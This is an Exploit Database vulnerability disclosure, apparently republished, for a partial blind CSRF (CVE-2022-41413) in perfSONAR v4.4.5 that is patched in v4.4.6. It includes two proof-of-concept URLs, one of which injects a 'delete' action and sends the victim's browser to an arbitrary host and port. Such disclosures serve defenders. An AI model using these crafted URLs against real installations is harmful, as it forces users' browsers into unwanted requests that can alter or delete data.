perfSONAR v4.4.5 – Partial Blind CSRF

• Exploit Database
• 16 阅读

• 作者： Ryan Moore
  日期： 2023-04-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51186/

• Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF
  Link: https://github.com/perfsonar/
  Affected Versions: v4.x <= v4.4.5
  Vulnerability Type: Partial Blind CSRF
  Discovered by: Ryan Moore
  CVE: CVE-2022-41413
  Summary
  
  A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.
  
  This vulnerability was patched in perfSONAR v4.4.6.
  Proof of Concept
  Examples
  
  Here are two examples of this vulnerability. For further details, review the Technical Overview section below.
  Example 1:
  
  Client browser connects to www.google.com in the background.
  http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com
  Example 2:
  
  Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.
  http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api